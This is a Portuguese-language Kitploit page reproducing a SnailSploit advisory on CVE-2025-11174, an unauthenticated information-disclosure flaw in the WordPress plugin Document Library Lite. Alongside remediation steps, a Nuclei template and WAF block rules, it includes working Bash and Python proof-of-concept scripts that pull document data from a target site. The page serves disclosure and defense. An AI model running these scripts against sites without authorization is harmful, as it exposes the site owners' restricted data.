Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174 | Kitploit
Ferramentas/GitHubGitHub/snailsploit/cve-2025-11174
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-11174: Divulgação Não Autenticada de Informações no Plugin WordPress Document Library Lite

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

Palavras-chave: CVE-2025-11174, Document Library Lite vulnerability, information disclosure, WordPress security, unauthenticated AJAX exploit, WordPress plugin vulnerability, CWE-862, WordPress document plugin security, authorization bypass, WordPress CVE 2025

Sumário

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Análise Técnica
  • Vetor de Ataque
  • Prova de Conceito
  • Guia de Remediação
  • Detecção
  • Métricas CVSS
  • Referências
  • Créditos
  • Contato de Segurança

Visão Geral

Vulnerabilidade de Divulgação de Informações no Plugin WordPress Document Library Lite (CVE-2025-11174) – Falha de segurança que permite acesso não autenticado a dados confidenciais de documentos no plugin de biblioteca de documentos do WordPress.

Foi descoberta uma vulnerabilidade crítica de bypass de autorização no Plugin WordPress Document Library Lite que permite que atacantes não autenticados acessem informações confidenciais de documentos sem a devida autenticação.

Descoberto por: Kai Aizen & Avraham Shemesh (SnailSploit)
Publicado: 1 de novembro de 2025
Pontuação CVSS: 5.3 (Médio)
CWE: CWE-862 – Autorização Ausente
Plugin: Document Library Lite
Fornecedor: Barn2 Plugins
Tipo de Ataque: Divulgação de Informações Não Autenticada
Privilégios Necessários: Nenhum (Ataque Não Autenticado)

Detalhes da Vulnerabilidade

Descrição

O plugin Document Library Lite para WordPress contém uma vulnerabilidade de autorização inadequada em todas as versões até a 1.1.6 inclusive. O plugin expõe uma ação AJAX não autenticada dll_load_posts que retorna uma tabela JSON de dados de documentos sem realizar verificações de nonce ou capacidade.

Impacto

Esta vulnerabilidade permite que atacantes não autenticados:

  • Acessem metadados de documentos sem autorização
  • Recuperem listagens de documentos que deveriam ser restritas
  • Visualizem informações de documentos destinadas apenas a usuários autenticados
  • Enumerem documentos armazenados na Document Library

Nota: A pontuação CVSS de 5.3 (gravidade Média) reflete divulgação limitada de informações. Embora a vulnerabilidade permita acesso não autenticado aos dados de documentos, o impacto é classificado como Baixo para confidencialidade, sem impacto na integridade ou disponibilidade.

Versões Afetadas

  • Vulnerável: Todas as versões ≤ 1.1.6
  • Corrigido: Versão 1.1.7 e superiores

Métricas CVSS v3.1

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Detalhamento CVSS v3.1:

  • Vetor de Ataque (AV): Rede – A vulnerabilidade pode ser explorada remotamente através de uma rede
  • Complexidade do Ataque (AC): Baixa – Nenhuma condição especial é necessária para exploração
  • Privilégios Necessários (PR): Nenhum – Nenhuma autenticação ou privilégios são necessários
  • Interação do Usuário (UI): Nenhuma – O exploit funciona sem qualquer interação do usuário
  • Escopo (S): Inalterado – A vulnerabilidade afeta apenas o componente vulnerável
  • Impacto na Confidencialidade (C): Baixo – Divulgação limitada de informações
  • Impacto na Integridade (I): Nenhum – Sem impacto na integridade
  • Impacto na Disponibilidade (A): Nenhum – Sem impacto na disponibilidade

Análise Técnica

Causa Raiz da Vulnerabilidade

A ação AJAX dll_load_posts é registrada sem verificações adequadas de autenticação ou autorização:

root@kitploit:~
// Padrão de código vulnerável (simplificado)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');

O prefixo wp_ajax_nopriv_ indica que esta ação é acessível a usuários não autenticados, e a função de retorno não implementa:

  • Verificação de nonce
  • Verificações de capacidade
  • Validação de autenticação do usuário

Vetor de Ataque

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=dll_load_posts

A vulnerabilidade pode ser explorada através do endpoint admin-ajax.php do WordPress sem autenticação.

Prova de Conceito

⚠️ Apenas para Fins Educacionais e de Teste Autorizados

PoC em Bash

root@kitploit:~
#!/bin/bash
# CVE-2025-11174 PoC

TARGET_URL="$1"

if [ -z "$TARGET_URL" ]; then
    echo "Usage: $0 <target_url>"
    echo "Example: $0 https://example.com"
    exit 1
fi

echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
echo "[*] Target: $TARGET_URL"
echo ""

# Send request to vulnerable AJAX endpoint
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=dll_load_posts" \
  | python3 -m json.tool

echo ""
echo "[+] If you see document data above, the site is vulnerable!"

PoC em Python

root@kitploit:~
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite Information Disclosure PoC
For educational and authorized testing purposes only
"""

import requests
import sys
import json

def exploit(target_url):
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}\n")
    
    data = {'action': 'dll_load_posts'}
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful!\n")
            try:
                json_data = response.json()
                print("[+] Retrieved document data:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] Site is VULNERABLE to CVE-2025-11174")
            except json.JSONDecodeError:
                print("[-] No JSON response received")
                print(f"Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)

Remediação

Para Administradores de Sites

Ação Imediata Necessária:

  1. Atualize para a versão 1.1.7 ou superior do Document Library Lite imediatamente
  2. Revise os logs de acesso do seu site em busca de requisições POST suspeitas para admin-ajax.php com action=dll_load_posts
  3. Se não puder atualizar imediatamente, considere desativar temporariamente o plugin

Instruções de Atualização

Via Admin do WordPress:

  1. Navegue até Plugins > Plugins Instalados no admin do WordPress
  2. Localize "Document Library Lite"
  3. Clique em Atualizar Agora para atualizar para a versão 1.1.7 ou superior
  4. Verifique se a atualização foi bem-sucedida

Usando WP-CLI:

root@kitploit:~
wp plugin update document-library-lite

Para Desenvolvedores de Plugins

Garanta que todos os manipuladores AJAX implementem os controles de segurança adequados:

root@kitploit:~
// Exemplo de segurança AJAX adequada
add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');

function dll_load_posts_callback() {
    // Verificar nonce
    if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
        wp_die('Invalid nonce');
    }
    
    // Verificar capacidades
    if (!current_user_can('read')) {
        wp_send_json_error('Insufficient permissions');
        wp_die();
    }
    
    // Seu código seguro aqui
}

Detecção

Verificação do Plugin WordPress

root@kitploit:~
# Verificar se uma versão vulnerável está instalada
wp plugin list | grep -i "document-library-lite"

Regras para Scanner de Segurança

Template Nuclei:

root@kitploit:~
id: CVE-2025-11174

info:
  name: Document Library Lite - Unauthenticated Information Disclosure
  author: security-research
  severity: medium
  description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
  reference:
    - https://github.com/[your-repo]/CVE-2025-11174
  tags: cve,cve2025,wordpress,wp-plugin,unauth

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    
    body: "action=dll_load_posts"
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "data"
          - "recordsTotal"
        condition: and
      
      - type: status
        status:
          - 200

Regras para Firewall de Aplicação Web

Regra ModSecurity:

root@kitploit:~
SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
    "chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
    log,deny,status:403,msg:'CVE-2025-11174 Exploit Attempt'"
    SecRule ARGS:action "@streq dll_load_posts" "t:none"

Regra Nginx/OpenResty:

root@kitploit:~
if ($request_uri ~* "admin-ajax\.php") {
    if ($args ~* "action=dll_load_posts") {
        return 403;
    }
}

Linha do Tempo

  • 1 de novembro de 2025 – Vulnerabilidade divulgada publicamente
  • 1 de novembro de 2025 – Registro CVE publicado
  • Novembro de 2025 – Patch lançado (versão 1.1.7)

Referências

  • CVE-2025-11174 - CVE.org
  • GitHub Advisory Database
  • Wordfence Intelligence
  • WordPress Plugin Directory

Créditos

Pesquisadores:

  • Avraham Shemesh
  • Kai Aizen - SnailSploit

Processo de Divulgação: Divulgação coordenada

Aviso Legal

Esta informação é fornecida apenas para fins de pesquisa em segurança e defesa. Qualquer exploração desta vulnerabilidade para fins maliciosos é ilegal e antiética. Sempre obtenha autorização adequada antes de testar sistemas que você não possui.

Contato

Para perguntas ou informações adicionais sobre esta vulnerabilidade:

  • E-mail: [email protected]
  • Site: snailsploit.com
  • Organização: SnailSploit Security Research

Última atualização: 2 de novembro de 2025


📚 Documentação & Autor

O artigo completo, metodologia e pesquisas relacionadas deste projeto estão em:

https://snailsploit.com/security-research/cves/cve-2025-11174/

Criado por Kai Aizen — pesquisador independente de segurança ofensiva.

snailsploit.com · Research · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

Mesmo ataque. Substrato diferente.

Baixar ferramenta
MétricaValor
Vetor de AtaqueRede (AV:N)
Complexidade do AtaqueBaixa (AC:L)
Privilégios NecessáriosNenhum (PR:N)
Interação do UsuárioNenhuma (UI:N)
EscopoInalterado (S:U)
ConfidencialidadeBaixa (C:L)
IntegridadeNenhum (I:N)
DisponibilidadeNenhum (A:N)